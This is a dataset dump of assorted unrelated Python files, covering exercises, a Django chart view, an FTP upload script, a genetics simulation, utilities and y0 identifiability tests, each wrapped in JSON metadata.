the weights as keys, \n    # and the index of the weights as values\n    for x,v in enumerate(weights):\n        result2.append(v)\n        result3.append(x)\n\n    d = {key:value for key, value in zip(result2, result3)}\n\n    #Now I scroll through the weights, and see if the limit, or target minus one of the values,\n    # is equal to another value; if so, I append these values to a list, and reverse the order\n    # so that the higher value comes first\n    for x in weights:\n        for y in weights:\n            if (limit-x) == y:\n                result = [x,y]\n                result.sort(reverse=True) \n    \n    # Another fringe case: they ask us to return indices 1 and 0 if the elements in result which add up\n    # to the limit are the same, so in this case, I check the indexes of result; if they are the same, I simply return \n    # result5, which is a [1,0] array\n    \n    for i, j in enumerate(result[:-1]):\n        if j == result[i+1]: \n            return result5 \n    \n    # Otherwise, in all other cases,\n    # I scroll through the values in the result array, check if the key in the dictionary is equal to the value,\n    # if so, append the key to result4, and return result4\n    for x in result:\n        for k,v in d.items():\n            if k == x:\n                result4.append(v)\n\n    return result4 \n\n\n","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246543111","text":"import jinja2\nimport webapp2\nimport os\nfrom google.appengine.ext import ndb\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n    loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n    extensions=['jinja2.ext.autoescape'],\n    autoescape=True)\n\nclass CommentEntry(ndb.Model):\n    \"\"\"A main model for representing an individual Comment entry.\"\"\"\n    username = ndb.StringProperty(indexed=False)\n    comment = ndb.StringProperty(indexed=False)\n    date = ndb.DateTimeProperty(auto_now_add=True)\n\nclass MainPage(webapp2.RequestHandler):\n    def get(self):\n        comments = CommentEntry.query().order(-CommentEntry.date).fetch(20)\n        template_values = {\n            'comments': comments\n        }\n        template = JINJA_ENVIRONMENT.get_template('main.html')\n        self.response.write(template.render(template_values))\n\n    def post(self):\n        username_entered = self.request.get('username')\n        comment_entered = self.request.get('comment')\n        if self.valid_username(username_entered) and self.valid_comment(comment_entered):\n            entry = CommentEntry(username = username_entered, comment = comment_entered)\n            entry.put()\n            self.redirect('/')\n        else:\n            template_values = {\n                'error': 'Username or comment are not valid!',\n                'username': username_entered,\n                'comment': comment_entered\n            }\n            template = JINJA_ENVIRONMENT.get_template('main.html')\n            self.response.write(template.render(template_values))\n\n    def valid_username(self, s):\n        m = len(s)\n        if m > 1 and m < 15:\n            return True\n        else:\n            return False\n\n    def valid_comment(self, s):\n        m = len(s)\n        if m > 5 and m < 1000:\n            return True\n        else:\n            return False\n\n\n\n\napp = webapp2.WSGIApplication([\n    ('/', MainPage), \n], debug=True)\n","sub_path":"mywebapp.py","file_name":"mywebapp.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637714455","text":"import unittest\nimport os\n\n\ndef all_tests():\n    suite = unittest.TestLoader().discover(\n        start_dir=os.path.dirname(__file__),\n        pattern='test_*.py',\n        top_level_dir=None\n    )\n    return suite\n\n\ndef run():\n    unittest.TextTestRunner(verbosity=2).run(all_tests())\n\n\nif __name__ == 
'__main__':\n    run()\n","sub_path":"testCase/allTest.py","file_name":"allTest.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62826769","text":"import ftplib\nimport os\n\nftp = ftplib.FTP('129.9.0.102', 'root', 'Test1234.') # FTP Connection information\nftp.dir() # Run \"dir\" command in current folder - cfcard:\nprint(\"..............1............................\")\n# ftp.mkd('newfile3') # Create new directory\n\n# ftp.cwd(\"logfile\") # Change directory\n# ftp.dir() # Run \"dir\" command in current folder - cfcard:/logfile\n# ftp.delete(\"umut3.cfg\") # Delete a file\n# ftp.rmd(\"newfile3\") # Delete a folder\n\nupload = open(\"Device_List.txt\", 'rb') # Choose file in local to upload\nftp.storbinary('STOR %s' % os.path.basename(\"Device_List.txt\"), upload, 1024) # File upload from PC to device\n","sub_path":"ftp-connection.py","file_name":"ftp-connection.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583888868","text":"from __future__ import print_function, division\nimport numpy, time, csv\nimport matplotlib.pyplot as plt\nimport scipy.stats.mstats\n\n#INITIALIZATIONS\n\nstart_time = time.time()\npopn = 1000\nlocii = 10\ntotal_gen = 150000\ngenerations = list(range(1, (total_gen+1)))\n\nref_types = []\n\nfor i in range(2**locii): #populating reference array of reference genotypes and epigenotypes\n    binaryRepresentation = list(format(i, 'b'))\n    finalRepresentation = [['0']*(locii-len(binaryRepresentation)) + binaryRepresentation]\n    ref_types = ref_types + finalRepresentation\n\nref_types =[[int(j) for j in i] for i in ref_types] #converting the string to int in the reference array\n\ndef partition(number, part):\n    q1, r1 = divmod(number, part)\n    indices = [q1 * i + min(i, r1) for i in xrange(part + 1)]\n    lens = [indices[i + 1] - indices[i] for i in range(part)]\n    return lens\n\t\ndef mutation(allele,freq): #defining mutation function\n    temp = numpy.random.rand()\n    if temp < freq:\n        return(int(not(allele)))\n    else:\n        return(allele)\n\ndef individual_cycle(gef, offspring, locii, gfitnessref,efitnessref, ref_types): \n    \n    gef_transient = [[list(gef[0]), list(gef[1]), gef[2]] for i in range(offspring)] #generating transient offspring of an individual as independent copies, so mutating one child cannot alias the parent or its siblings\n\n    for i1 in range(offspring): \n        for i2 in range(2): # (0 - genome, 1 - epigenome , 2 - fitness)\n            for i3 in range(locii): #iterating through locii\n\n                if i2 == 0: #mutation of genome\n                    gef_transient[i1][i2][i3] = mutation(gef_transient[i1][i2][i3], 10**-6)\n\n                if i2 == 1:#mutation of epigenome\n                    gef_transient[i1][i2][i3] = mutation(gef_transient[i1][i2][i3], 10**-4)\n\t\t\t\n        w_g = gfitnessref[ref_types.index(gef_transient[i1][0])] #to compare genotype of individual to reference genotypes and get the genetic fitness\n        w_e = efitnessref[ref_types.index(gef_transient[i1][1])] #to compare epigenotype of individual to reference epigenotypes and get the epigenetic fitness\n        gef_transient[i1][2] = max(w_g, w_e)\n    \n    return gef_transient #array of kids of the individual and their genome, epigenome, fitnesses\n\ndef iterations(num, gef_small, offspring_small,locii,gfitnessref,efitnessref, ref_types):\n    return sum([individual_cycle(gef_small[indiv], offspring_small[indiv],locii,gfitnessref,efitnessref, ref_types) for indiv in range(num)],[])\n\n# ******FOR PARALLEL PROCESSING ************************\nimport pp\nppservers = ()\nncpus = 8\njob_server = pp.Server(ncpus, ppservers=ppservers)\ncores = 
job_server.get_ncpus() # number of cores/workers being used\ninputs = partition(popn, cores) # Job distribution to each core\n\n# --------------------------------------------------------\n\t\t\navg_w = [] #will have the average fitness of each generation\n\n#CREATING the fitness landscape for this replication\ngfitnessref = [0.1 for i in range((2**locii)-1)] + [1.5]#populating reference arrays of FITNESSES of genotypes and epigenotypes by using binary scheme\ngfitnessref[682] = 1.5\nefitnessref = [0.1 for i in range((2**locii)-1)] + [1.5]\nefitnessref[682] = 1.5\n\n#populating gef array of first generation of this replication with monomorphic genome, epigenome, and the corresponding fitness (0.1, in this case)\ngef = [[[0]*locii, [0]*locii, 0.1] for i in range(popn)]\n\nfor count in range(total_gen): #LOOP FOR THE GENERATIONS WITHIN A SINGLE REPLICATION\n\n    #SCALING THE FITNESSES AND GETTING ARRAY OF OFFSPRING NUMBER\n    w_array = [gef[i][2] for i in range(popn)] #populating an array with only the fitnesses of the individuals\n    fitness_sum = sum(w_array)\n    avg_w += [fitness_sum/popn] #appending to an array of average fitnesses of each generation\n    scaling_factor = 1 / fitness_sum # calculating scaling factor for fitness\n    w_scaled = list(map(lambda x: x*scaling_factor, w_array)) #multiplying each fitness by the scaling factor to update this population fitness array for this generation to use in multinomial function\n    offspring = numpy.random.multinomial(popn, w_scaled) #generating number of offspring of every individual\n\n    #gef_megatransient=iterations(popn,gef, offspring)\n    #parallelisation code - to run individual_cycle on parts of the gef array, which are groups of individuals distributed to the cores\n    job1 = [job_server.submit(iterations, (input, gef[sum(inputs[:ii]):sum(inputs[:ii])+input], offspring[sum(inputs[:ii]):sum(inputs[:ii])+input], locii, gfitnessref, efitnessref, ref_types,), (individual_cycle, mutation,), (\"numpy\",)) for ii, input in enumerate(inputs)]\n    gef = sum([i() for i in job1], []) #summing up the per-offspring gef_transient arrays returned by individual_cycle\n\n#POST PROCESSING OF CODE\n\ngm_forward = []\ngm_backward = []\n\nfor i in range(total_gen-999):\n\n    gm_forward += [scipy.stats.mstats.gmean(avg_w[:(1000 + i)])]\n    #gm_backward += [scipy.stats.mstats.gmean(avg_w[(99000-i):])]\n\ngm_backward = list(reversed(gm_backward))\n\nwith open('avg_fitnesses2.csv', 'w') as myfile:\n    wr = csv.writer(myfile)\n    wr.writerow(avg_w)\n\nwith open('gm_forward2.csv', 'w') as myfile:\n    wr = csv.writer(myfile)\n    wr.writerow(gm_forward)\n\n#with open('gm_backward.csv', 'w') as myfile:\n   # wr = csv.writer(myfile)\n   # wr.writerow(gm_backward)\n\nplt.figure(figsize=(45, 20))\nplt.plot(generations, avg_w, 'r', ## generations[:99001], gm_backward, 'y',\n         generations[999:], gm_forward)\nplt.savefig('monomorphic, double peak, forwards+backwards2.png', bbox_inches = 'tight')\n\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n \n\n \n\n \n","sub_path":"double peak/monomorphic starting gen/150, 000 gen/monomorphic double peak - Copy.py","file_name":"monomorphic double peak - Copy.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585654014","text":"class Point(object):\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n\n    # def __repr__(self):\n    #     return '({}, {})'.format(self.x, self.y)\n\n    # def __str__(self):\n    #     return '({}, {})'.format(self.x, self.y)\n\n\ndef 
prepare_points(N, color_str):\n points = []\n for i in range(N):\n tmp = input().split()\n x, y = int(tmp[0]), int(tmp[1])\n point = Point(x, y)\n points.append((point, color_str))\n return points\n\n\ndef main():\n N = int(input())\n red_points = prepare_points(N, 'r')\n blue_points = prepare_points(N, 'b')\n sorted_ = sorted((red_points + blue_points), key=lambda x: x[0].x)\n uses = set()\n count = 0\n for item in sorted_:\n if item[1] == 'r':\n uses.add(item)\n else:\n reds = {\n foo\n for foo in uses if foo[1] == 'r' and foo[0].y < item[0].y\n }\n # print(item, reds)\n if not reds:\n continue\n max_p = max(reds, key=lambda x: x[0].y)\n if max_p[0].y < item[0].y:\n uses.remove(max_p)\n count += 1\n # print(sorted_)\n # print(uses)\n print(count)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"abc091/main_restartC.py","file_name":"main_restartC.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"494925326","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom datetime import datetime\nfrom .models import Patients\nfrom csv import reader\nimport datetime\nimport logging\nimport json\nfrom django.db import connection\nfrom django.db.models import Min, Max\nfrom django.http import JsonResponse\n\n\n# Create your views here.\ndef index(request):\n # return HttpResponse('HELLO FROM CHARTS')\n return render(request, 'charts/index.html')\n\n\ndef upload_csv(request):\n data = {}\n\n if request.method == 'GET':\n return render(request, \"charts/index.html\", data)\n\n # if not GET, then proceed\n try:\n csv_file = request.FILES[\"csv_file\"]\n\n if not csv_file.name.endswith('.csv'):\n messages.error(request, 'File is not CSV type')\n return HttpResponseRedirect(reverse(\"upload_csv\"))\n # if file is too large, return\n if csv_file.multiple_chunks():\n messages.error(request, \"Uploaded file is too big (%.2f MB).\" % (csv_file.size / (1000 * 1000),))\n return HttpResponseRedirect(reverse(\"upload_csv\"))\n\n file_data = csv_file.read().decode(\"utf-8\")\n\n i = 0\n\n lines = file_data.split(\"\\n\")\n\n for line in reader(lines):\n\n if i > 0:\n p = Patients(\n first_name=line[1],\n last_name=line[2],\n gender=line[3],\n date_of_surgery=date_surgery(line[4]),\n icd10procedure=line[5],\n city=line[6],\n date_of_birth=date_birth(line[7]),\n icd10desc=line[8]\n )\n\n p.save()\n\n i += 1\n\n except Exception as e:\n logging.getLogger(\"error_logger\").error(\"Unable to upload file. \" + repr(e))\n messages.error(request, \"Unable to upload file. 
\" + repr(e))\n\n content = {\n 'line': line,\n 'line_len': len(line),\n 'patient': p,\n }\n\n return render(request, \"charts/show_charts.html\", content)\n\n\n# format birth date from csv\n# mm/dd/yyyy --> yyyy-mm-dd\n# if date from csv empty set default value (1800-01-01)\ndef date_birth(date_birth_from_csv):\n\n if '/' not in date_birth_from_csv:\n return datetime.datetime(year=1800, month=1, day=1)\n\n date_info = date_birth_from_csv.split(\"/\")\n date_month =date_info[0]\n date_day = date_info[1]\n date_year = date_info[2]\n return datetime.datetime(year=int(date_year), month=int(date_month), day=int(date_day))\n\n\n# check surgery date from csv\n# if surgery date from csv empty set default value (1800-01-01)\ndef date_surgery(date_surgery_from_csv):\n\n if '-' not in date_surgery_from_csv:\n return datetime.datetime(year=1800, month=1, day=1)\n\n return date_surgery_from_csv\n\n# get data for D3 charts\ndef charts_data(request):\n\n p = Patients.objects.all()\n\n data_ch01 = data_chart_01()\n data_ch02 = data_chart_02(20, 2016, 3, 2017, 8)\n data_ch03 = data_chart_03()\n data_ch04 = data_chart_04()\n\n min_date = Patients.objects.filter(date_of_surgery__year__gte=1900).aggregate(Min('date_of_surgery'))\n max_date = Patients.objects.all().aggregate(Max('date_of_surgery'))\n\n content = {\n 'data_ch01': json.dumps(data_ch01),\n 'data_ch02': json.dumps(data_ch02),\n 'data_ch03': json.dumps(data_ch03),\n 'data_ch04': json.dumps(data_ch04),\n 'date_min': min_date['date_of_surgery__min'],\n 'date_max': max_date['date_of_surgery__max'],\n 'range_months': range(1, 13),\n }\n\n return render(request, \"charts/show_charts.html\", content)\n\n\n# chart 1 data - number of patients by age range\ndef data_chart_01():\n\n p = Patients.objects.all()\n\n age_range = 5\n age_range_start = 10\n age_range_stop = 80\n\n data = []\n b = {\"X\": \"1-5\", \"Y\": 10}\n\n for age in range (age_range_start, age_range_stop, age_range):\n birth_date_start = date_years_ago(age + age_range - 1)\n birth_date_stop = date_years_ago(age)\n\n p_count = Patients.objects.filter(date_of_birth__range=(birth_date_start, birth_date_stop)).count()\n\n b[\"X\"] = str(age) + '-' + str(age + age_range - 1)\n b[\"Y\"] = p_count\n data.append(b.copy())\n\n return data\n\n\n# count patients by age range for selected months\ndef data_chart_02(age_range, year_start, month_start, year_end, month_end):\n data = []\n\n for year in range(year_start, year_end+1, 1):\n month_from = month_start\n month_to = month_end\n if year != year_start:\n month_from = 1\n if year != year_end:\n month_to = 12\n\n for month in range(month_from, month_to+1, 1):\n\n patients_list = Patients.objects.filter(date_of_surgery__year=year, date_of_surgery__month=month)\n\n tmp = {}\n label_x = str(month) + '/' + str(year)\n tmp[\"X\"] = label_x\n\n age_range_start = 10\n age_range_stop = 80\n\n for age in range(age_range_start, age_range_stop, age_range):\n birth_date_start = date_years_ago(age + age_range - 1)\n birth_date_stop = date_years_ago(age)\n\n patients_count = patients_list.filter(date_of_birth__range=(birth_date_start, birth_date_stop)).count()\n key = str(age) + '-' + str(age + age_range - 1)\n tmp[key] = patients_count\n\n data.append(tmp.copy())\n\n return data\n\n\n# count patients by age range for selected months\ndef data_chart_03():\n data = []\n\n month_start = 2\n month_end = 11\n year_start = 2016\n year_end = 2017\n\n for year in range(year_start, year_end+1, 1):\n month_from = month_start\n month_to = month_end\n if year != year_start:\n 
month_from = 1\n        if year != year_end:\n            month_to = 12\n\n        for month in range(month_from, month_to+1, 1):\n\n            patients_list = Patients.objects.filter(date_of_surgery__year=year, date_of_surgery__month=month)\n\n            tmp = {}\n            label_x = str(month) + '/' + str(year)\n            tmp[\"X\"] = label_x\n\n            male_patients_count = patients_list.filter(gender='male').count()\n            female_patients_count = patients_list.filter(gender='female').count()\n\n            total = male_patients_count + female_patients_count\n            if total > 0:\n                tmp[\"male\"] = male_patients_count/total\n                tmp[\"female\"] = 1-tmp[\"male\"]\n            else:\n                tmp[\"male\"] = 0.01\n                tmp[\"female\"] = 0.01\n\n            data.append(tmp.copy())\n    # end for year\n\n    return data\n\n\n# draw most common procedures\ndef data_chart_04():\n    data = []\n\n    raw_query = \"SELECT \"\n    raw_query += \" substring_index(icd10desc, ' ', 1) as first_word,\"\n    raw_query += \" id, count(id) as total\"\n    raw_query += \" FROM charts_patients\"\n    raw_query += \" WHERE substring_index(icd10desc, ' ', 1) <> ''\"\n    raw_query += \" GROUP BY first_word ORDER BY count(id) DESC\"\n\n    cursor = connection.cursor()\n    cursor.execute(raw_query)\n\n    raw_query_result = cursor.fetchall()\n    procedures = list(raw_query_result)\n\n    procedures_limit = 10\n    if len(procedures) < 10:\n        procedures_limit = len(procedures)\n\n    b = {}\n    for i in range(0, procedures_limit, 1):\n        b[\"X\"] = procedures[i][0]\n        b[\"Y\"] = int(procedures[i][2])\n        data.append(b.copy())\n\n    return data\n\n\ndef date_years_ago(years, from_date=None):\n\n    if from_date is None:\n        from_date = datetime.datetime.today()\n\n    try:\n        return from_date.replace(year=from_date.year - years)\n    except ValueError:\n        # assert from_date.month == 2 and from_date.day == 29\n        return from_date.replace(month=2, day=28, year=from_date.year-years)\n\n\ndef chart02_update(request):\n\n    age_range = request.GET.get('age_range', 10)\n    year_from = request.GET.get('year_from', 2015)\n    month_from = request.GET.get('month_from', 1)\n    year_to = request.GET.get('year_to', 2017)\n    month_to = request.GET.get('month_to', 12)\n\n    data = data_chart_02(\n        int(age_range),\n        int(year_from),\n        int(month_from),\n        int(year_to),\n        int(month_to)\n    )\n\n    return JsonResponse(data, safe=False)\n\n","sub_path":"charts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510961832","text":"#PY.01.16 Project 9 : Make your own coin\n# Description: It is a program explaining the OOP concepts of class, object, constructor and destructor.\n#It creates a coin from the Pound class and makes changes to it with the help of the functions defined\n# Class is the template with the states and behaviour of an object type\n# Object is the instance of the class\nclass Pound:\n    \n    value=1.00\n    colour=\"gold\"\n    diameter=1.5 #cm\n\n    def rust(p):\n        p.colour=\"green\"\n\ncoin1=Pound()\ncoin2=Pound()\nprint(type(coin1)) #gives the type as the class\nprint(coin1.value)\ncoin1.value=1.4 #we have assigned a new value\nprint(coin1.value) # this new value will apply only to that specific object\nprint(coin2.value)\ncoin1.rust()\nprint(coin1.colour)\n\n\nclass Pound2:\n    def __init__(self,rare=False): #Constructor\n\n        self.rare=rare\n        if self.rare:\n            self.symbol=\"tails\" \n        else:\n            self.symbol = \"heads\"\n\n        self.colour=\"gold\"\n        self.diameter=1.12 #cm\n    def __del__(self): #Destructor\n        print(\"coin spent\")\n    \n    def rust(self): \n        self.colour=\"green\"\n    def clean(self):\n        self.colour=\"gold\"\n        \n        
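# module-level demo: build coins with and without the rare flag, exercise rust()/clean(), and delete one so the destructor fires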
\ncoin1=Pound2(rare=True) #We can pass arguments with the class name if we have a constructor\nprint(coin1.symbol)\ncoin4=Pound2()\nprint(coin4.symbol)\ncoin1.rust()\nprint(coin1.colour)\ncoin1.clean()\nprint(coin1.colour)\ncoin5=Pound2()\ndel coin5\nprint(coin5.colour) #raises NameError: the name was deleted, so the destructed coin is no longer defined\n    \n","sub_path":"Make_Your_Coin.py","file_name":"Make_Your_Coin.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596188635","text":"import re\nfrom utils.url_utils import capture_urls\n\nMISSING_TAG_MESSAGE = \"\"\nBAD_REGISTER_COMMAND = \"\"\nREGISTER_SUCCESS = \"\"\nOTHERL_ERROR = \"\"\n\n\ndef fix_url_if_comes_in_list(url):\n    if isinstance(url, str):\n        pattern = re.compile(r\"^\\[.*\\]$\")\n        if pattern.match(url) is not None:\n            url = url[1:]\n            url = url[:-1]\n            return url\n    return 
url\n\n\ndef is_image_url(url):\n    pattern = re.compile(r\"http.*(\\.jpg)|(\\.png)|(\\.gif)|(\\.jpeg)$\")\n    print(pattern.match(url) is not None)\n    return pattern.match(url) is not None\n\n\ndef is_change_tag_message(message):\n    pattern = re.compile(r\"^/tag(\\s[\\w\\-]+)*$\")\n    print(pattern.match(message) is not None)\n    return pattern.match(message) is not None\n\n\ndef get_amazon_tag(message):\n    pattern = re.compile(r\"^(/tag)\\s([\\w\\-]+)$\")\n    if pattern.match(message) is not None:\n        return pattern.match(message).group(2)\n    else:\n        return None\n\n\ndef get_coupon_info(message):\n\n    pattern = re.compile(r\"^/[Cc]upon\\s(\\w+)\\s([$?\\d\\,\\.\\']+[€$]?)\\s(http.*)$\")\n    if pattern.match(message) is not None:\n        groups = pattern.match(message).groups()\n        code = groups[0]\n        price = groups[1]\n        urls = capture_urls(groups[2])\n        return {'code': code,\n                'final_price': price,\n                'urls': urls}\n    else:\n        return None","sub_path":"utils/regex_utils.py","file_name":"regex_utils.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246133245","text":"\"\"\"\nIf an exception/error occurs in a program, the whole program exits immediately, which is not reasonable.\nWe need to handle exceptions.\n\"\"\"\n\n# print(1)\n# 1/0\n# print(2)\n\n\n# 1. Exception handling: wrap whatever may raise inside a try statement.\n# Execution order: top to bottom, entering the try block first;\n# if no exception occurs inside try,\n# the program does not enter except and simply continues downwards;\n# if an exception does occur, the statements after the error inside try are not executed any more,\n# and control jumps straight into except, provided that type of exception is caught;\n# if that type is not caught, the program exits directly.\n\n# print(0)\n# try:\n#     print(1)\n#     1/0\n#     print(2)\n# except ZeroDivisionError as e:\n#     print(\"Caught an exception: your divisor was 0\")\n#     print(e)\n# print(3)\n#\n# try:\n#     print(1)\n#     int(\"ase\")\n#     print(2)\n# except ValueError as e:\n#     print(\"Caught an exception\")\n#     print(e)\n\n# A single except clause only catches the matching exception; other types are not caught.\n# The exception name must match exactly for it to be caught, otherwise the error propagates.\n\n# 2. How to catch several exceptions at once\n# try:\n#     print(1)\n#     1/0\n#     int(\"ase\")\n#     print(2)\n# except (ValueError, ZeroDivisionError) as e:\n#     print(\"Caught an exception 1111\")\n#     print(e)\n\n\n# try:\n#     print(1)\n#     1/0\n#     int(\"ase\")\n#     print(2)\n# except (ValueError, ZeroDivisionError) as e:\n#     print(\"Caught an exception 1111\")\n#     print(e)\n\n\n# 3. Use the common base class Exception to catch the common exception types\n\n# print(0)\n# try:\n#     print(1)\n#     int(\"ase\")\n#     1/0\n#     print(2)\n# except Exception as e:\n#     print(\"Caught an exception 1111\")\n#     print(e)\n\n\"\"\"\nCommon Python exception types:\n\nBaseException base class for all exceptions\n SystemExit the interpreter requests exit\n KeyboardInterrupt execution interrupted by the user (usually Ctrl-C)\n GeneratorExit raised inside a generator to signal exit\n Exception base class for regular errors\n ZeroDivisionError division (or modulo) by zero (all numeric types)\n AttributeError the object has no such attribute\n StopIteration the iterator has no more values\n IOError an input/output operation failed\n OSError operating system error\n ImportError importing a module/object failed\n IndexError no such index in the sequence\n KeyError no such key in the mapping\n MemoryError out of memory (not fatal for the Python interpreter)\n NameError object not declared/initialised (no such name)\n RuntimeError generic runtime error\n NotImplementedError method not yet implemented\n IndentationError indentation error\n SystemError generic interpreter system error\n TypeError operation invalid for the type\n ValueError an invalid argument was passed\n\n Warning base class for warnings\n\"\"\"\n# IndexError\nli = [1, 2, 5, 6]\n# li[9]\n\n# StopIteration: the iterator has no more values\n# a = iter(li)\n# next(a)\n# next(a)\n# next(a)\n# next(a)\n# next(a)\n\n\n# 4. try/except can be followed by else\n# when else runs: if except was not entered, else is executed\n# print(0)\n# try:\n#     print(1)\n#     # 1/0\n#     # int(\"ase\")\n#     print(2)\n# except Exception as e:\n#     print(e)\n# else:\n#     print(\"dui\")\n#\n# print(3)\n\n\n# 5.\ntry:\n    print(1)\n    # 1. connect to the database\n    # 2. operate on the database\n    # 3. close the connection\n    1/0\nexcept Exception as e:\n    print(e)\nfinally:  # executes even if the exception raised in try was never caught\n    print(\"I will run whether or not an error is raised\")\n\n","sub_path":"woniu_workspace/python/day06/a01_异常处理.py","file_name":"a01_异常处理.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77656908","text":"import sublime, sublime_plugin\nfrom . 
import latexconverter\n\nclass LatexToWpCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tlatex = self.view.substr(sublime.Region(0, self.view.size()))\n\t\tconverter = latexconverter.LatexConverter()\n\t\twp = converter.latex2wp(latex)\n\n\t\tv = self.view.window().new_file()\n\t\tv.set_scratch(True)\n\t\tv.insert(edit, 0, wp)\n\n","sub_path":"latex2wp.py","file_name":"latex2wp.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5195041","text":"\"\"\"\nPackage: State Machine\nFile: SMControls\n\n\n\"\"\"\n\nimport sm \nfrom primitives import *\n\nclass PID(sm.SM):\n    def __init__(self, Kp, Ki, Kd):\n        self.Kp = Kp\n        self.Ki = Ki\n        self.Kd = Kd\n        \n        self.machine = ParallelAdd(Gain(Kp), \\\n                       ParallelAdd(Cascade(Gain(Ki), Integrator()), \\\n                       Cascade(Gain(Kd), Derivative())))\n        \n        self.startState = self.machine.startState\n\n\n    def getNextValues(self, state, inp):\n        return self.machine.getNextValues(state, inp)\n\n\n\n","sub_path":"lib/statemachine/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"240946974","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\ndef formataData(data):\n\ttry:\n\t\tdia = data[0:2]\n\t\tmes = data[2:4]\n\t\tano = data[4:8]\n\n\t\treturn datetime.date(int(ano), int(mes), int(dia))\n\texcept (TypeError, ValueError):\n\t\treturn None","sub_path":"mscmcldap/util/date_util.py","file_name":"date_util.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"478473040","text":"#!/usr/bin/env python3\n\n# Written by Thomas York\n\n# Imports\n\nimport zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.SUB)\n\nprint(\"Testing ZeroMQ datafeed of terminal information...\")\nsocket.connect('tcp://127.0.0.1:5556')\nsocket.setsockopt(zmq.SUBSCRIBE, b'')\n\nwhile True:\n    message = socket.recv_string()\n    print(message)\n","sub_path":"test-terminal.py","file_name":"test-terminal.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"555772699","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Tests for the identify algorithm.\"\"\"\n\nimport unittest\nfrom typing import Union\n\nfrom y0.dsl import Distribution, P, Probability, X, Y, Z\nfrom y0.graph import NxMixedGraph\nfrom y0.identify import _get_to, is_identifiable\n\n\nclass TestUtils(unittest.TestCase):\n    \"\"\"Test utility functions for ID algorithms.\"\"\"\n\n    def test_to(self):\n        \"\"\"Test getting treatments and outcomes.\"\"\"\n        with self.assertRaises(ValueError):\n            _get_to(P(X))\n        with self.assertRaises(ValueError):\n            _get_to(P(X, Y))\n        with self.assertRaises(ValueError):\n            _get_to(P(X @ Y, X @ Z))\n\n        for expected_t, expected_o, probability in [\n            ([\"X\"], [\"Y\"], P(Y @ X)),\n            ([\"X\"], [\"Y\", \"Z\"], P(Y @ X, Z @ X)),\n        ]:\n            t, o = _get_to(probability)\n            self.assertEqual(expected_t, t)\n            self.assertEqual(expected_o, o)\n\n\nclass TestNotIdentifiable(unittest.TestCase):\n    \"\"\"Tests for lack of identifiability.\n\n    These tests are based on the examples from the Figure 1 series on\n    https://github.com/COVID-19-Causal-Reasoning/Y0/blob/master/ID_whittemore.ipynb.\n    \"\"\"\n\n    def assert_not_identifiable(\n        self, graph: NxMixedGraph, query: Union[Probability, Distribution]\n    ) -> None:\n        \"\"\"Assert the graph is not 
identifiable under the given query.\"\"\"\n        self.assertFalse(is_identifiable(graph, query))\n\n    def test_figure_1a(self):\n        \"\"\"Test Figure 1A.\"\"\"\n        graph_1a = NxMixedGraph()\n        graph_1a.add_directed_edge(\"X\", \"Y\")\n        graph_1a.add_undirected_edge(\"X\", \"Y\")\n        self.assert_not_identifiable(graph_1a, P(Y @ ~X))\n\n    def test_figure_1b(self):\n        \"\"\"Test Figure 1B.\"\"\"\n        graph_1b = NxMixedGraph()\n        graph_1b.add_directed_edge(\"X\", \"Z\")\n        graph_1b.add_directed_edge(\"Z\", \"Y\")\n        graph_1b.add_undirected_edge(\"X\", \"Z\")\n        self.assert_not_identifiable(graph_1b, P(Y @ ~X))\n\n    def test_figure_1c(self):\n        \"\"\"Test Figure 1c.\"\"\"\n        graph_1c = NxMixedGraph()\n        graph_1c.add_directed_edge(\"X\", \"Z\")\n        graph_1c.add_directed_edge(\"Z\", \"Y\")\n        graph_1c.add_directed_edge(\"X\", \"Y\")\n        graph_1c.add_undirected_edge(\"X\", \"Z\")\n        self.assert_not_identifiable(graph_1c, P(Y @ ~X))\n\n    def test_figure_1d(self):\n        \"\"\"Test Figure 1d.\"\"\"\n        graph_1d = NxMixedGraph()\n        